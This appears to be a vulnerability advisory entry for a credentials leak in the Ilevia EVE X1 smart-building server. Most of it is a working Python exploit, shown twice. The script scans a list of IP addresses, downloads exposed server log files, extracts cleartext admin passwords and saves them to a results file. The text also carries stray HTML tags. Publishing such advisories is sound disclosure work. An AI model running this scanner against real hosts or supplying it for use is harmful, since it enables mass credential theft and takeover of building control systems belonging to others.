Description
Title: Ilevia EVE X1 Server 4.7.18.0.eden Credentials...
Basic Information
ID
ZSL-2025-5957
Published
Aug 19, 2025 at 00:00
Affected Product
Affected Versions
<html><body><p>#!/usr/bin/env python
#
#
# Ilevia EVE X1 Server 4.7.18.0.eden Credentials Leak Through Log Disclosure
#
#
# Vendor: Ilevia Srl.
# Product web page: https://www.ilevia.com
# Affected version: <= 4.7.18.0.eden (Logic ver: 6.00)
#
# Summary: EVE is a smart home and building automation solution designed
# for both residential and commercial environments, including malls, hotels,
# restaurants, bars, gyms, spas, boardrooms, and offices. It enables comprehensive
# control and monitoring of electrical installations through a highly customizable,
# user-friendly interface.
#
# EVE is a multi-protocol platform that integrates various systems within
# a smart building to enhance comfort, security, safety, and energy efficiency.
# Users can manage building functions via iPhone, iPad, Android devices, Windows
# PCs, or Mac computers.
#
# The EVE X1 Server is the dedicated hardware solution for advanced building
# automation needs. Compact and powerful, it is ideal for apartments, small
# to medium-sized homes, and smaller commercial installations. It is designed
# to manage entire automation systems reliably and efficiently.
#
# Desc: A critical vulnerability was identified in the EVE smart home and BMS/BAS
# controller system due to improper handling of sensitive information in server-side
# logging. Specifically, .log files accessible via the web server expose cleartext
# credentials, including username and password submitted during authentication
# process. This disclosure enables unauthenticated remote attackers to retrieve
# valid login credentials simply by accessing exposed log files, leading to full
# system compromise.
#
# Tested on: GNU/Linux 5.4.35 (armv7l)
# GNU/Linux 4.19.97 (armv7l)
# Armbian 20.02.1 Buster
# Apache/2.4.38 (Debian)
# PHP Version 7.3.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2025-5957
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5957.php
#
# CWE ID: 532
# CWE URL: https://cwe.mitre.org/data/definitions/532.html
#
#
# 01.05.2024
#
import requests
import sys#####
import re######
def leak(line):
match = re.search(r'Authenticate R:1 admin\s+([^\s\[]+)', line)
return match.group(1) if match else None
def target(ip, port):
paths = [
f"http://{ip}:{port}/80-history/eve-server.log",
f"http://{ip}:{port}/80-history/eve.log"
]
for url in paths:
try:
r = requests.get(url, timeout=5)
if r.status_code == 200:
for line in r.text.splitlines():
if "Authenticate R:1 admin" in line:
pwd = leak(line)
if pwd:
return f"{ip}:{port}:admin:{pwd}"
elif r.status_code == 404:
return None
except requests.exceptions.RequestException:
return None
return None
def main():
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} IPLIST.txt")
sys.exit(1)
I_file = sys.argv[1]
O_file = "valid_creds.txt"
default_port = "8080"
results = []
with open(I_file, "r") as f:
ip_list = [line.strip() for line in f if line.strip()]
total = len(ip_list)
for idx, line in enumerate(ip_list, 1):
if ':' in line:
ip, port = line.split(':', 1)
else:
ip, port = line, default_port
print(f"[{idx}/{total}] Scanning {ip}:{port}...", end="\r")
result = target(ip, port)
if result:
print(" " * 80, end="\r")
print(f"[+] {result}")
results.append(result)
if results:
with open(O_file, "w") as out:
for line in results:
out.write(line + "\n")
print(f"\n[+] Done. {len(results)} valid credentials saved to {O_file}")
else:
print("\n[-] No credentials leaked.")
if __name__ == "__main__":
main()
</p></body></html>
#
#
# Ilevia EVE X1 Server 4.7.18.0.eden Credentials Leak Through Log Disclosure
#
#
# Vendor: Ilevia Srl.
# Product web page: https://www.ilevia.com
# Affected version: <= 4.7.18.0.eden (Logic ver: 6.00)
#
# Summary: EVE is a smart home and building automation solution designed
# for both residential and commercial environments, including malls, hotels,
# restaurants, bars, gyms, spas, boardrooms, and offices. It enables comprehensive
# control and monitoring of electrical installations through a highly customizable,
# user-friendly interface.
#
# EVE is a multi-protocol platform that integrates various systems within
# a smart building to enhance comfort, security, safety, and energy efficiency.
# Users can manage building functions via iPhone, iPad, Android devices, Windows
# PCs, or Mac computers.
#
# The EVE X1 Server is the dedicated hardware solution for advanced building
# automation needs. Compact and powerful, it is ideal for apartments, small
# to medium-sized homes, and smaller commercial installations. It is designed
# to manage entire automation systems reliably and efficiently.
#
# Desc: A critical vulnerability was identified in the EVE smart home and BMS/BAS
# controller system due to improper handling of sensitive information in server-side
# logging. Specifically, .log files accessible via the web server expose cleartext
# credentials, including username and password submitted during authentication
# process. This disclosure enables unauthenticated remote attackers to retrieve
# valid login credentials simply by accessing exposed log files, leading to full
# system compromise.
#
# Tested on: GNU/Linux 5.4.35 (armv7l)
# GNU/Linux 4.19.97 (armv7l)
# Armbian 20.02.1 Buster
# Apache/2.4.38 (Debian)
# PHP Version 7.3.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2025-5957
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5957.php
#
# CWE ID: 532
# CWE URL: https://cwe.mitre.org/data/definitions/532.html
#
#
# 01.05.2024
#
import requests
import sys#####
import re######
def leak(line):
match = re.search(r'Authenticate R:1 admin\s+([^\s\[]+)', line)
return match.group(1) if match else None
def target(ip, port):
paths = [
f"http://{ip}:{port}/80-history/eve-server.log",
f"http://{ip}:{port}/80-history/eve.log"
]
for url in paths:
try:
r = requests.get(url, timeout=5)
if r.status_code == 200:
for line in r.text.splitlines():
if "Authenticate R:1 admin" in line:
pwd = leak(line)
if pwd:
return f"{ip}:{port}:admin:{pwd}"
elif r.status_code == 404:
return None
except requests.exceptions.RequestException:
return None
return None
def main():
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} IPLIST.txt")
sys.exit(1)
I_file = sys.argv[1]
O_file = "valid_creds.txt"
default_port = "8080"
results = []
with open(I_file, "r") as f:
ip_list = [line.strip() for line in f if line.strip()]
total = len(ip_list)
for idx, line in enumerate(ip_list, 1):
if ':' in line:
ip, port = line.split(':', 1)
else:
ip, port = line, default_port
print(f"[{idx}/{total}] Scanning {ip}:{port}...", end="\r")
result = target(ip, port)
if result:
print(" " * 80, end="\r")
print(f"[+] {result}")
results.append(result)
if results:
with open(O_file, "w") as out:
for line in results:
out.write(line + "\n")
print(f"\n[+] Done. {len(results)} valid credentials saved to {O_file}")
else:
print("\n[-] No credentials leaked.")
if __name__ == "__main__":
main()
</p></body></html>